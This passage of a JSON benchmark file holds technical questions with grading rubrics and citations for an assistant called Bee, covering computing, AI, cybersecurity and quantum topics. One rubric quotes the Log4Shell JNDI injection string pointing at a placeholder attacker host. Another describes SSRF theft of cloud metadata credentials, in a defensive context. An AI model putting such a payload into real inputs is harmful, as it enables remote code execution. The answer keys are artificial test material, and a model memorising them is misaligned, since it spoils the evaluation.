{
  "$schema": "bee-eval-v1",
  "version": "1.0.0",
  "created": "2026-04-29",
  "description": "Per-domain eval set for Bee. 10 Tier-1 domains × 12 questions each = 120 questions. Every question carries a verifiable citation (NIST/RFC/Qiskit-textbook/SWC/etc.) so an LLM-judge can grade against a real source rather than its own training data. Difficulty mix: ~3 beginner, ~6 intermediate, ~3 expert per domain.",
  "scoring": {
    "judge": "deepseek-v4-pro",
    "rubric_levels": ["correct", "partial", "wrong", "refused"],
    "score_map": {"correct": 1.0, "partial": 0.5, "wrong": 0.0, "refused": 0.0}
  },
  "domains": {
    "general": {
      "description": "broad reasoning + factual + multi-step explanations",
      "questions": [
        {"id": "general-01", "difficulty": "beginner", "prompt": "Explain in 2-3 sentences why a hash table has O(1) average lookup time but O(n) worst case.", "rubric": "Must mention: average case is O(1) due to direct indexing via hash function; worst case is O(n) when many keys collide and degrade to linear probing/list traversal. Bonus: mentions load factor.", "citation": "https://en.wikipedia.org/wiki/Hash_table#Performance"},
        {"id": "general-02", "difficulty": "beginner", "prompt": "What does the acronym ACID stand for in databases, and what does each letter mean?", "rubric": "Atomicity (all-or-nothing), Consistency (DB stays valid), Isolation (concurrent txns don't see each other's intermediates), Durability (committed survives crash). All four must be present.", "citation": "https://en.wikipedia.org/wiki/ACID"},
        {"id": "general-03", "difficulty": "intermediate", "prompt": "A team complains that their REST API returns 200 OK with an error JSON body when authentication fails. What HTTP status code should they use instead, and why?", "rubric": "Should use 401 Unauthorized (per RFC 9110). Reason: 200 means success; using it for auth failure breaks every HTTP intermediary that relies on status codes (caches, monitoring, retries). Bonus: 403 distinction (auth'd but forbidden).", "citation": "https://www.rfc-editor.org/rfc/rfc9110.html#name-401-unauthorized"},
        {"id": "general-04", "difficulty": "intermediate", "prompt": "Explain the difference between a process and a thread in 3-4 sentences.", "rubric": "Process = isolated memory space, OS-level scheduling unit, has its own PID. Thread = lighter unit of execution within a process, shares the process's memory/heap. Threads are cheaper to create and switch between, but a crash in one can take down the others. Process isolation is enforced by hardware (MMU).", "citation": "https://en.wikipedia.org/wiki/Thread_(computing)"},
        {"id": "general-05", "difficulty": "intermediate", "prompt": "Why is `2 + 2 == 4` exactly true in IEEE 754 floating point, but `0.1 + 0.2 == 0.3` is false?", "rubric": "Small powers of 2 are exactly representable; 0.1, 0.2, 0.3 are repeating fractions in binary so they round to the nearest representable double, accumulating tiny errors. The sum 0.1+0.2 rounds differently than the literal 0.3.", "citation": "https://en.wikipedia.org/wiki/IEEE_754"},
        {"id": "general-06", "difficulty": "intermediate", "prompt": "What is the CAP theorem and what's the practical takeaway for distributed system design?", "rubric": "Of {Consistency, Availability, Partition tolerance}, you can guarantee at most 2 simultaneously when a network partition occurs. Practical takeaway: in real distributed systems P is unavoidable, so the real choice is C vs A during partitions. Mentions Brewer/Gilbert-Lynch credit is bonus.", "citation": "https://en.wikipedia.org/wiki/CAP_theorem"},
        {"id": "general-07", "difficulty": "expert", "prompt": "An engineer says they want to use Conflict-free Replicated Data Types (CRDTs) instead of operational transformation. Give two specific advantages and one specific tradeoff.", "rubric": "Advantages (any 2): no central server / convergence without coordination, easier offline-first design, eventual consistency proven mathematically, simpler conflict semantics. Tradeoff: state size grows over time (need garbage collection / pruning), or some semantics (e.g., true 'last-write-wins') aren't naturally expressible without metadata.", "citation": "https://en.wikipedia.org/wiki/Conflict-free_replicated_data_type"},
        {"id": "general-08", "difficulty": "beginner", "prompt": "What is the speed of light in a vacuum, in meters per second? You can give the rounded number.", "rubric": "Approximately 3.0 × 10^8 m/s (or 299,792,458 m/s exactly, since 1983 SI definition).", "citation": "https://en.wikipedia.org/wiki/Speed_of_light"},
        {"id": "general-09", "difficulty": "intermediate", "prompt": "Briefly: what is a memory leak in a garbage-collected language like Java or Python? Give one common pattern that causes it.", "rubric": "Memory the program no longer needs but still holds a reference to, so the GC can't reclaim it. Common patterns: unbounded caches, listeners/callbacks that never deregister, growing global lists/dicts, closures capturing large objects, ThreadLocal in pooled threads.", "citation": "https://docs.oracle.com/en/java/javase/21/troubleshoot/memory-leaks.html"},
        {"id": "general-10", "difficulty": "expert", "prompt": "What is amortized analysis, and why is the amortized cost of appending to a Python list O(1) even though resizing is occasionally O(n)?", "rubric": "Amortized analysis averages cost across a sequence of operations. Python lists overallocate (grow by ~1.125x or doubling); a resize is O(n) but happens every n appends, so the cost spread over those n appends is O(n)/n = O(1). Each append's amortized cost is O(1).", "citation": "https://docs.python.org/3/faq/design.html#how-are-lists-implemented-in-cpython"},
        {"id": "general-11", "difficulty": "intermediate", "prompt": "Explain the difference between TCP and UDP in one paragraph. Give one example use case for each.", "rubric": "TCP: connection-oriented, reliable, ordered, retransmits dropped packets, congestion-controlled. Use case: HTTP/HTTPS, file transfers, SSH. UDP: connectionless, fire-and-forget, no retransmission, lower overhead. Use case: DNS, real-time video/audio, gaming, QUIC's underlying transport.", "citation": "https://www.rfc-editor.org/rfc/rfc9293.html (TCP), https://www.rfc-editor.org/rfc/rfc768 (UDP)"},
        {"id": "general-12", "difficulty": "expert", "prompt": "What is Big O notation's biggest practical limitation when comparing two algorithms? Give a concrete example.", "rubric": "Big O drops constants and lower-order terms, so two algorithms with the same Big O class can have wildly different real-world performance. Example: insertion sort O(n^2) is faster than merge sort O(n log n) for n < ~20-50 because of cache locality and lower constant factors; quicksort with median-of-3 pivot has the same O(n^2) worst case as bubble sort but is dramatically faster in practice. Or: O(n) algorithm with constant 1000 is slower than O(n log n) with constant 1 for any realistic n.", "citation": "https://en.wikipedia.org/wiki/Big_O_notation#Family_of_Bachmann%E2%80%93Landau_notations"}
      ]
    },
    "programming": {
      "description": "code review, debugging, language-specific patterns, build/test tooling",
      "questions": [
        {"id": "programming-01", "difficulty": "beginner", "prompt": "In Python, what's the difference between `is` and `==`?", "rubric": "`is` checks identity (same object in memory); `==` checks equality (calls __eq__). Example: `[1,2] == [1,2]` is True, but `[1,2] is [1,2]` is False. Singleton check: `x is None` is the canonical way (not `x == None`).", "citation": "https://docs.python.org/3/reference/expressions.html#comparisons"},
        {"id": "programming-02", "difficulty": "beginner", "prompt": "Write a Python function `is_palindrome(s: str) -> bool` that ignores case and non-alphanumeric characters.", "rubric": "Must define `def is_palindrome(s)`. Strips non-alphanumeric, lowercases, compares to reverse. Idiomatic: `s = ''.join(c.lower() for c in s if c.isalnum()); return s == s[::-1]`. Empty string returning True is acceptable.", "citation": "https://docs.python.org/3/library/stdtypes.html#str.isalnum"},
        {"id": "programming-03", "difficulty": "intermediate", "prompt": "What's wrong with this Python code: `def add_to(item, lst=[]): lst.append(item); return lst` ? How do you fix it?", "rubric": "Mutable default argument is shared across all calls — appending mutates the same list. Calling `add_to(1)` twice returns `[1,1]`, not `[1]`. Fix: `def add_to(item, lst=None): if lst is None: lst = []; lst.append(item); return lst`.", "citation": "https://docs.python.org/3/reference/compound_stmts.html#function-definitions (default value evaluated once)"},
        {"id": "programming-04", "difficulty": "intermediate", "prompt": "In Rust, what's the difference between `String` and `&str`? When would you take each as a function parameter?", "rubric": "`String` is owned, heap-allocated, growable. `&str` is a borrowed slice into UTF-8 bytes. As a parameter: take `&str` for read-only (most flexible — accepts both `&String` via deref coercion and `&str` literals); take `String` only when you need ownership (e.g., to store it). Best practice: prefer `&str` for params unless you need ownership.", "citation": "https://doc.rust-lang.org/book/ch04-03-slices.html"},
        {"id": "programming-05", "difficulty": "intermediate", "prompt": "Explain Go's `defer` statement and one common pitfall.", "rubric": "`defer` schedules a function call to run when the surrounding function returns (LIFO order). Pitfall: arguments are evaluated at defer-statement time, not at call time — `defer fmt.Println(i)` inside a loop captures the current `i`, not the final one. Or: deferring inside a loop accumulates many deferred calls; can cause resource exhaustion if files/locks aren't released until function exit.", "citation": "https://go.dev/blog/defer-panic-and-recover"},
        {"id": "programming-06", "difficulty": "intermediate", "prompt": "What is structural typing vs nominal typing? Which one does TypeScript use?", "rubric": "Nominal: types match by name (Java, C#, Rust). Structural: types match by shape — if the shape fits, it's the same type. TypeScript is structural: `interface A { x: number } interface B { x: number }` are interchangeable. Practical implication: object literals can satisfy multiple interfaces simultaneously.", "citation": "https://www.typescriptlang.org/docs/handbook/type-compatibility.html"},
        {"id": "programming-07", "difficulty": "expert", "prompt": "What does `git rebase -i HEAD~3 --autosquash` do, and how does it interact with `git commit --fixup=<sha>`?", "rubric": "`--autosquash` reorders any commits with `fixup!` or `squash!` prefixes (created by `--fixup`/`--squash`) so they land immediately after their target commit, ready for squash. Workflow: make a `--fixup=<sha>` commit during dev → run `rebase -i HEAD~N --autosquash` → editor opens with the fixups already aligned. Saves manual reordering.", "citation": "https://git-scm.com/docs/git-rebase#Documentation/git-rebase.txt---autosquash"},
        {"id": "programming-08", "difficulty": "beginner", "prompt": "Write a Python list comprehension that returns squares of even numbers in `[1, 2, 3, 4, 5, 6]`.", "rubric": "`[x*x for x in [1,2,3,4,5,6] if x % 2 == 0]` → `[4, 16, 36]`. Or `[x**2 for ... if x%2==0]`.", "citation": "https://docs.python.org/3/tutorial/datastructures.html#list-comprehensions"},
        {"id": "programming-09", "difficulty": "expert", "prompt": "In a Python web app handling 10k requests/sec, you switch from blocking sync I/O to asyncio. The throughput barely changes. Name three plausible reasons.", "rubric": "Any three of: (1) the bottleneck is CPU/database/external service latency, not I/O blocking; (2) GIL contention if there's CPU work between awaits; (3) the underlying library still does sync I/O under an async wrapper (e.g., a sync DB driver wrapped in run_in_executor); (4) connection pool size is the real cap; (5) DNS / TLS handshakes done sequentially rather than batched.", "citation": "https://docs.python.org/3/library/asyncio.html"},
        {"id": "programming-10", "difficulty": "intermediate", "prompt": "What's the difference between `git merge` and `git rebase`? Which produces a cleaner history, and what's the cost?", "rubric": "Merge preserves both branches' history with a merge commit; rebase replays your commits on top of the target branch (linear history). Rebase produces cleaner history but rewrites commit hashes — dangerous on shared/published branches. Merge is safe but creates merge commits.", "citation": "https://git-scm.com/book/en/v2/Git-Branching-Rebasing"},
        {"id": "programming-11", "difficulty": "intermediate", "prompt": "Write a SQL query: from a table `orders(id, user_id, total, created_at)`, return the user with the highest total spend in 2026, with their total. Use standard SQL.", "rubric": "Must SUM(total) GROUP BY user_id, filter created_at year, ORDER BY total DESC LIMIT 1. Acceptable variations: window function (ROW_NUMBER), subquery with MAX(SUM(...)), CTE. Should handle the tie case or note it.", "citation": "https://www.postgresql.org/docs/current/sql-select.html"},
        {"id": "programming-12", "difficulty": "expert", "prompt": "What is tail-call optimization (TCO)? Which mainstream languages support it, and why doesn't Python?", "rubric": "TCO: when the last action of a function is a function call, reuse the current stack frame instead of pushing a new one — turns recursion into iteration, prevents stack overflow. Supports: Scheme/Racket (mandated), Lua, OCaml, Erlang, Scala (annotated), C/C++ (compilers may but not guaranteed). Python deliberately does NOT — Guido's stated reason: TCO obscures stack traces, hurts debuggability. Workaround: rewrite as a loop.", "citation": "https://neopythonic.blogspot.com/2009/04/tail-recursion-elimination.html (Guido's post)"}
      ]
    },
    "ai": {
      "description": "ML/AI fundamentals: model architecture, training, inference, evaluation, RAG, fine-tuning, prompt engineering",
      "questions": [
        {"id": "ai-01", "difficulty": "beginner", "prompt": "What's the difference between supervised, unsupervised, and reinforcement learning, in one sentence each?", "rubric": "Supervised: learn input→output from labeled examples. Unsupervised: learn structure/patterns from unlabeled data (clustering, dimensionality reduction, density estimation). Reinforcement: learn a policy by interacting with an environment and receiving rewards.", "citation": "https://en.wikipedia.org/wiki/Machine_learning"},
        {"id": "ai-02", "difficulty": "intermediate", "prompt": "In LoRA fine-tuning, what's the role of `r` (rank) and `alpha`? What's a typical r value for a 7B model?", "rubric": "`r` is the rank of the low-rank update — controls capacity (higher r = more parameters). `alpha` is a scaling factor: the effective LoRA contribution = (alpha / r) * B*A*x. Typical r for 7B: 8-32 (most papers use 8 or 16). Typical alpha = 16 or 32. The ratio alpha/r is what really matters for the magnitude of the update.", "citation": "https://arxiv.org/abs/2106.09685 (LoRA paper)"},
        {"id": "ai-03", "difficulty": "intermediate", "prompt": "Why does the transformer's attention mechanism scale as O(n²) with sequence length? What's one technique that addresses this?", "rubric": "Each token attends to every other token → n×n attention matrix → O(n²) time and memory. Techniques (any one): FlashAttention (recompute, kernel-fused, still O(n²) compute but O(n) memory), sparse attention (Longformer, BigBird), linear attention approximations (Performer, Linformer), sliding window (Mistral), Mamba/state-space models (linear in n).", "citation": "https://arxiv.org/abs/2205.14135 (FlashAttention)"},
        {"id": "ai-04", "difficulty": "expert", "prompt": "What's the difference between RLHF and DPO for preference fine-tuning? Why has DPO become more popular?", "rubric": "RLHF: train a reward model from preferences, then use PPO to optimize the policy against that reward. Three stages, complex, unstable. DPO: directly optimize the policy from preference pairs without an explicit reward model — uses a closed-form analytical solution that turns the RL problem into supervised classification. Popular because: simpler (no reward model, no PPO), more stable, lower compute, comparable or better results.", "citation": "https://arxiv.org/abs/2305.18290 (DPO paper)"},
        {"id": "ai-05", "difficulty": "beginner", "prompt": "What does 'temperature' control in LLM sampling? What does temperature=0 do?", "rubric": "Temperature scales the logits before softmax; lower = more peaked distribution (deterministic), higher = flatter (more random). T=0 = greedy decoding (always pick the argmax token). T=1 = use raw probabilities. Typical creative range 0.7-1.2.", "citation": "https://platform.openai.com/docs/guides/text-generation"},
        {"id": "ai-06", "difficulty": "intermediate", "prompt": "What is a context window in an LLM, and what happens when input exceeds it?", "rubric": "Context window = max number of tokens the model can attend to at once (GPT-4-turbo: 128K, Claude Opus 4.7: 200K-1M). Exceeding it: depending on tooling, either truncated (oldest tokens dropped), errored, or chunked. The model has zero awareness of anything beyond the window.", "citation": "https://platform.openai.com/docs/models"},
        {"id": "ai-07", "difficulty": "expert", "prompt": "What's the difference between a Mixture of Experts (MoE) model and a dense model of the same parameter count? Give one practical implication.", "rubric": "MoE has many specialist sub-networks; only a few are activated per token (sparse routing). Total params >> active params (e.g., DeepSeek V3: 671B total, ~37B active). Practical: same inference compute as a small dense model but with the knowledge capacity of a much larger one. Tradeoff: harder to train (load balancing, expert collapse), bigger memory footprint at rest, complex serving infrastructure.", "citation": "https://arxiv.org/abs/1701.06538 (Sparsely-Gated Mixture-of-Experts)"},
        {"id": "ai-08", "difficulty": "intermediate", "prompt": "What is a 'system prompt' vs a 'user prompt' in instruction-tuned models? Why does it matter?", "rubric": "System prompt: persistent instructions about role/style/constraints, set once at conversation start. User prompt: the actual query. Models trained with chat templates treat them differently — system prompt has higher precedence, persists across turns, used for behavior shaping. In Claude/GPT/Llama-Instruct chat templates, they have distinct role tokens (e.g., `<|system|>` vs `<|user|>`).", "citation": "https://huggingface.co/docs/transformers/main/en/chat_templating"},
        {"id": "ai-09", "difficulty": "expert", "prompt": "In RAG (retrieval-augmented generation), what's the typical embedding dimensionality, and why might you choose a smaller one?", "rubric": "Common: 384 (MiniLM/BGE-small), 768 (BERT-base/MiniLM-L12), 1024 (BGE-large), 1536 (OpenAI text-embedding-3-small), 3072 (text-embedding-3-large). Smaller: less storage, faster ANN search, sometimes comparable retrieval quality. Larger captures finer semantic distinctions. Tradeoff: 384 is plenty for English retrieval over <1M docs; >1M docs benefit from 768+.", "citation": "https://huggingface.co/spaces/mteb/leaderboard"},
        {"id": "ai-10", "difficulty": "intermediate", "prompt": "What's the difference between fine-tuning a full model and using LoRA? When would you choose each?", "rubric": "Full fine-tune: update every parameter. Cost: full optimizer state (≈4× param memory), risks catastrophic forgetting, large checkpoint sizes. LoRA: train only a small low-rank decomposition (~0.1-1% of params). Cost: much cheaper, smaller checkpoints, less forgetting. Choose full fine-tune for: very different task/domain than pre-training, lots of data. Choose LoRA for: moderate adaptation, multi-task with adapter swapping, limited compute.", "citation": "https://arxiv.org/abs/2106.09685"},
        {"id": "ai-11", "difficulty": "expert", "prompt": "What is 'catastrophic forgetting' in continual learning, and what's one mitigation?", "rubric": "When fine-tuning on new task, model loses performance on old tasks because gradient updates overwrite the relevant weights. Mitigations (any one): elastic weight consolidation (EWC) — penalize moves away from important old weights; LoRA — keeps base frozen; experience replay (mix old and new data); progressive networks; LwF (learning without forgetting via distillation).", "citation": "https://www.pnas.org/doi/10.1073/pnas.1611835114 (EWC paper)"},
        {"id": "ai-12", "difficulty": "intermediate", "prompt": "Explain BLEU vs ROUGE in 2-3 sentences. When is each used?", "rubric": "BLEU: precision-oriented, n-gram overlap of generated text with reference(s). Designed for translation. ROUGE: recall-oriented, used for summarization (ROUGE-N for n-grams, ROUGE-L for longest common subsequence). Both are surface-level metrics that don't capture meaning — modern eval prefers BERTScore or LLM-as-judge.", "citation": "https://aclanthology.org/W04-1013/ (ROUGE), https://aclanthology.org/P02-1040/ (BLEU)"}
      ]
    },
    "cybersecurity": {
      "description": "threat modeling, vulnerability analysis, OWASP, cryptography, incident response (defensive only)",
      "questions": [
        {"id": "cybersecurity-01", "difficulty": "beginner", "prompt": "What does the acronym OWASP Top 10 refer to? Name 3 of the categories from the most recent (2021) edition.", "rubric": "OWASP Top 10 = the most critical web application security risks, published by OWASP. 2021 categories: Broken Access Control, Cryptographic Failures, Injection, Insecure Design, Security Misconfiguration, Vulnerable Components, Auth Failures, Software/Data Integrity Failures, Logging/Monitoring Failures, SSRF. Any 3 from this list.", "citation": "https://owasp.org/Top10/"},
        {"id": "cybersecurity-02", "difficulty": "intermediate", "prompt": "What is SQL injection? Give one defensive technique that ELIMINATES it (not just mitigates).", "rubric": "SQL injection: attacker-supplied input is concatenated into a SQL query, allowing them to alter the query semantics. Defensive technique that eliminates: parameterized queries / prepared statements (the database treats input as data, not SQL). Input validation / WAF / escaping are mitigations, not eliminators. ORMs typically use parameterization under the hood.", "citation": "https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html"},
        {"id": "cybersecurity-03", "difficulty": "intermediate", "prompt": "What is the principle of least privilege, and how does it apply to a Linux service running as root?", "rubric": "Each user/process should have only the minimum permissions needed to do its job. Service running as root: violates POLP — full system access if compromised. Mitigation: run as dedicated unprivileged user, drop capabilities, use systemd unit hardening (NoNewPrivileges, PrivateTmp, ProtectSystem=strict), or chroot/container.", "citation": "https://www.nist.gov/news-events/news/2017/04/principle-least-privilege-fundamental-cybersecurity"},
        {"id": "cybersecurity-04", "difficulty": "expert", "prompt": "What is post-quantum cryptography (PQC), and which algorithm did NIST standardize for general-purpose key encapsulation in 2024?", "rubric": "PQC = cryptographic algorithms believed secure against quantum computers (Shor's algorithm breaks RSA/ECC). NIST standardized: ML-KEM (Module-Lattice KEM, formerly CRYSTALS-Kyber, FIPS 203, August 2024) for key encapsulation. Also: ML-DSA (Dilithium, FIPS 204) for signatures, SLH-DSA (SPHINCS+, FIPS 205).", "citation": "https://csrc.nist.gov/pubs/fips/203/final"},
        {"id": "cybersecurity-05", "difficulty": "beginner", "prompt": "Explain the difference between symmetric and asymmetric encryption in 2-3 sentences. Give one example algorithm of each.", "rubric": "Symmetric: same key encrypts and decrypts (AES, ChaCha20). Fast, but key distribution is the hard problem. Asymmetric: public/private key pair — encrypt with one, decrypt with the other (RSA, ECC, Ed25519, ML-KEM). Slower, but solves key distribution. Real systems use both: asymmetric to exchange a symmetric session key, then symmetric for bulk data (TLS handshake pattern).", "citation": "https://www.rfc-editor.org/rfc/rfc8446 (TLS 1.3)"},
        {"id": "cybersecurity-06", "difficulty": "intermediate", "prompt": "What is CSRF (Cross-Site Request Forgery), and what's the standard mitigation?", "rubric": "CSRF: attacker tricks a user's authenticated browser into making an unwanted request (e.g., a form post that transfers funds). Browser auto-attaches cookies. Standard mitigation: CSRF tokens (one-time random value tied to session, validated on state-changing requests), or SameSite=Strict/Lax cookies, or double-submit cookie pattern. Modern frameworks (Django, Rails, Laravel) handle this automatically.", "citation": "https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html"},
        {"id": "cybersecurity-07", "difficulty": "expert", "prompt": "What's the difference between authentication and authorization? Give a concrete example showing both in a single API request.", "rubric": "Authentication = who are you (verify identity, e.g. via JWT/session/OAuth token). Authorization = what can you do (check if identity has permission for this action). Example: a request `DELETE /api/projects/42` arrives with a Bearer token. Auth: server validates JWT signature → identifies user_id=alice. Authz: server checks alice's role/ACL on project 42 → denies if not owner. Both must pass.", "citation": "https://www.rfc-editor.org/rfc/rfc6749 (OAuth 2.0)"},
        {"id": "cybersecurity-08", "difficulty": "intermediate", "prompt": "What does STRIDE stand for, and what's it used for?", "rubric": "STRIDE = Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Elevation of Privilege. Used for threat modeling — a structured way to enumerate threats per component or data flow. Microsoft origin (Howard/LeBlanc).", "citation": "https://learn.microsoft.com/en-us/azure/security/develop/threat-modeling-tool-threats"},
        {"id": "cybersecurity-09", "difficulty": "intermediate", "prompt": "What's the difference between MD5, SHA-256, and bcrypt? Which should you use for password hashing?", "rubric": "MD5/SHA-256: cryptographic hash functions, fast — designed for fast hashing of arbitrary data. bcrypt: deliberately slow password hash with work factor (cost), built-in salt. Use bcrypt (or Argon2id, or scrypt) for passwords. NEVER MD5/SHA-256 raw — they're too fast, allowing brute-force/rainbow tables.", "citation": "https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html"},
        {"id": "cybersecurity-10", "difficulty": "expert", "prompt": "Reference CVE-2021-44228 (Log4Shell). What was the vulnerability, what was the canonical fix, and what's the lesson for input handling?", "rubric": "Log4Shell: Apache Log4j 2.x JNDI lookup feature allowed user-supplied strings like `${jndi:ldap://attacker.com/evil}` to trigger remote class loading and RCE. Canonical fix: upgrade to Log4j 2.17.0+ (which removes JNDI lookups by default) or set `log4j2.formatMsgNoLookups=true`. Lesson: log strings should NEVER be interpreted/parsed; logging libraries should treat input as opaque data.", "citation": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228"},
        {"id": "cybersecurity-11", "difficulty": "beginner", "prompt": "What is two-factor authentication (2FA), and why is SMS-based 2FA considered weaker than TOTP/hardware keys?", "rubric": "2FA: combine two of {something you know, something you have, something you are}. SMS is weaker because: SIM swap attacks, SS7 protocol vulnerabilities, phone number portability fraud, plaintext on cell network. TOTP (RFC 6238 — Google Authenticator-style) and hardware keys (FIDO2/WebAuthn) don't depend on the cell network and are bound to a device.", "citation": "https://www.rfc-editor.org/rfc/rfc6238 (TOTP)"},
        {"id": "cybersecurity-12", "difficulty": "expert", "prompt": "What is server-side request forgery (SSRF), and why is the AWS instance metadata service (IMDSv1) a famous target?", "rubric": "SSRF: attacker tricks a server into making a request to a URL of the attacker's choice — internal services, cloud metadata endpoints, etc. AWS IMDSv1 at 169.254.169.254 returns temporary credentials with no auth — an SSRF that hits it can leak the instance's IAM role credentials (the Capital One 2019 breach). Mitigation: IMDSv2 requires a session token (PUT then GET), blocking simple SSRF. Also: deny outbound connections to link-local addresses from app servers.", "citation": "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-instance-metadata-service.html"}
      ]
    },
    "quantum": {
      "description": "quantum computing fundamentals, Qiskit, NISQ-era realism, post-quantum crypto",
      "questions": [
        {"id": "quantum-01", "difficulty": "beginner", "prompt": "What is a qubit, and how does it differ from a classical bit?", "rubric": "Qubit: quantum two-level system that can be in a superposition α|0⟩ + β|1⟩, where |α|² + |β|² = 1. Classical bit is 0 or 1. Measuring a qubit collapses it to |0⟩ (probability |α|²) or |1⟩ (probability |β|²). Qubits also support entanglement — joint states that can't be factored into individual qubit states.", "citation": "https://qiskit.org/textbook/ch-states/representing-qubit-states.html"},
        {"id": "quantum-02", "difficulty": "intermediate", "prompt": "What's the difference between Shor's algorithm and Grover's algorithm? Which threatens current cryptography?", "rubric": "Shor's: factors integers (and computes discrete logs) in polynomial time on a quantum computer — exponential speedup over classical. Grover's: unstructured search in O(√N) vs classical O(N) — quadratic speedup. Shor's threatens RSA, ECC, DH (which rely on factoring/DLP being hard). Grover's only halves the effective bit security of symmetric ciphers (AES-256 → effectively AES-128, still safe by doubling key sizes).", "citation": "https://arxiv.org/abs/quant-ph/9508027 (Shor), https://arxiv.org/abs/quant-ph/9605043 (Grover)"},
        {"id": "quantum-03", "difficulty": "intermediate", "prompt": "What does NISQ stand for, and what are the practical limitations it implies?", "rubric": "NISQ = Noisy Intermediate-Scale Quantum (Preskill 2018). Implies: tens to hundreds of physical qubits, no fault tolerance, decoherence times in microseconds, gate errors ~0.1-1%, very limited circuit depth (~50-100 gates) before noise dominates. Practical: most claimed quantum advantages on real hardware are sampling-style, not general-purpose computation.", "citation": "https://arxiv.org/abs/1801.00862 (Preskill NISQ paper)"},
        {"id": "quantum-04", "difficulty": "beginner", "prompt": "Write a Qiskit snippet that creates a Bell state (|Φ+⟩ = (|00⟩+|11⟩)/√2) on 2 qubits and measures both.", "rubric": "Must include: `qc = QuantumCircuit(2, 2); qc.h(0); qc.cx(0, 1); qc.measure([0,1], [0,1])`. The Hadamard on qubit 0 creates superposition, CNOT entangles them. Acceptable variations include using `cx(0,1)` or `cnot`.", "citation": "https://qiskit.org/textbook/ch-gates/multiple-qubits-entangled-states.html"},
        {"id": "quantum-05", "difficulty": "expert", "prompt": "Explain the Hadamard gate's matrix representation and what it does to |0⟩ and |1⟩.", "rubric": "H = (1/√2) * [[1, 1], [1, -1]]. H|0⟩ = (|0⟩+|1⟩)/√2 = |+⟩. H|1⟩ = (|0⟩-|1⟩)/√2 = |-⟩. Creates an equal superposition; H is its own inverse (H² = I).", "citation": "https://qiskit.org/textbook/ch-states/single-qubit-gates.html"},
        {"id": "quantum-06", "difficulty": "intermediate", "prompt": "What is quantum entanglement, and why does it matter for quantum algorithms?", "rubric": "Entanglement: two or more qubits in a joint state that can't be factored into individual states (e.g., (|00⟩+|11⟩)/√2). Measuring one instantly determines the other's outcome correlations, regardless of distance — but doesn't transmit information FTL. Matters for algorithms because it enables quantum parallelism: an entangled n-qubit register encodes 2^n amplitudes simultaneously.", "citation": "https://qiskit.org/textbook/ch-states/multiple-qubits-entangled-states.html"},
        {"id": "quantum-07", "difficulty": "expert", "prompt": "What's the difference between a logical qubit and a physical qubit in fault-tolerant quantum computing?", "rubric": "Physical qubit: actual hardware qubit (superconducting, trapped ion, photonic). Noisy. Logical qubit: error-corrected qubit encoded across many physical qubits via a quantum error-correcting code (e.g., surface code requires ~1000+ physical qubits per logical qubit at current error rates). Fault-tolerant computation requires logical qubits; today's NISQ devices have only physical qubits.", "citation": "https://en.wikipedia.org/wiki/Surface_code"},
        {"id": "quantum-08", "difficulty": "intermediate", "prompt": "How many Grover iterations are optimal for searching an unstructured list of N=16 items, and what's the success probability?", "rubric": "Optimal iterations ≈ (π/4)√N = (π/4)*4 ≈ 3.14 → round to 3. With 3 iterations on N=16, success probability is approximately sin²((2k+1)θ) where sin θ = 1/√N — ends up ~96% for k=3. Acceptable answer: '~3 iterations, very high success probability (>95%)'.", "citation": "https://qiskit.org/textbook/ch-algorithms/grover.html"},
        {"id": "quantum-09", "difficulty": "expert", "prompt": "Why can't quantum computers be used to make a copy of an unknown quantum state? Reference the relevant theorem.", "rubric": "No-cloning theorem (Wootters & Zurek 1982; Dieks 1982): no quantum operation can copy an arbitrary unknown state |ψ⟩. Mathematically: a unitary U can't satisfy U|ψ⟩|0⟩ = |ψ⟩|ψ⟩ for all |ψ⟩ — would violate linearity. Practical implication: enables quantum key distribution (BB84) — eavesdropping is detectable because Eve can't perfectly clone the photon.", "citation": "https://www.nature.com/articles/299802a0 (Wootters-Zurek)"},
        {"id": "quantum-10", "difficulty": "intermediate", "prompt": "What is decoherence, and why does it limit quantum computation?", "rubric": "Decoherence: loss of quantum superposition/entanglement due to interaction with the environment (thermal photons, magnetic field fluctuations, vibrations). Quantum information leaks into the environment, making the qubit behave classically. T1 (relaxation) and T2 (dephasing) coherence times bound the maximum circuit depth — typical superconducting qubits: T2 ≈ 50-200 μs, gates take ~50-500 ns, so ~100-1000 gates max before noise dominates.", "citation": "https://qiskit.org/textbook/ch-quantum-hardware/error-correction-repetition-code.html"},
        {"id": "quantum-11", "difficulty": "beginner", "prompt": "What does the Pauli-X gate do, and what's its matrix representation?", "rubric": "Pauli-X = quantum NOT gate. X|0⟩ = |1⟩, X|1⟩ = |0⟩. Matrix: [[0, 1], [1, 0]]. Self-inverse (X² = I).", "citation": "https://qiskit.org/textbook/ch-states/single-qubit-gates.html"},
        {"id": "quantum-12", "difficulty": "expert", "prompt": "What's the difference between gate-model quantum computing and quantum annealing? Which approach is D-Wave's, and what problems is it suited to?", "rubric": "Gate model: discrete unitary operations (gates) on qubits, universal computation (Qiskit, IBM Heron, IonQ). Quantum annealing: continuous evolution of a Hamiltonian to find ground state — solves optimization problems (specifically QUBO / Ising). D-Wave is annealing-only, not universal. Suited to: combinatorial optimization, sampling, some ML problems. NOT suited to: Shor's algorithm, general quantum simulation.", "citation": "https://en.wikipedia.org/wiki/Quantum_annealing"}
      ]
    },
    "blockchain": {
      "description": "Bitcoin/Ethereum mechanics, smart contract design, consensus, cryptographic primitives",
      "questions": [
        {"id": "blockchain-01", "difficulty": "beginner", "prompt": "What is a blockchain, in 2-3 sentences? Mention the key data structure.", "rubric": "Distributed append-only ledger. Each block contains a list of transactions and a hash of the previous block — forming a chain of cryptographic commitments. Tampering with any past block breaks all subsequent hashes. Validated by a consensus mechanism (PoW, PoS, BFT) across a peer-to-peer network.", "citation": "https://bitcoin.org/bitcoin.pdf"},
